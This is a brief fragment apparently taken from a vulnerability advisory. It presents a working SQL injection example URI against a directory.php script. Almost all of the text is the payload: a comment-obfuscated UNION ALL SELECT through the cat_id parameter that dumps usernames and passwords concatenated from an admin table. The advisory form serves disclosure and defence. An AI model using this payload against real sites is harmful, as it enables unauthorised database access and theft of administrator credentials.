| Code |
Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/directory.php?ax=list&sub=7&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/FROM/**/admin/* |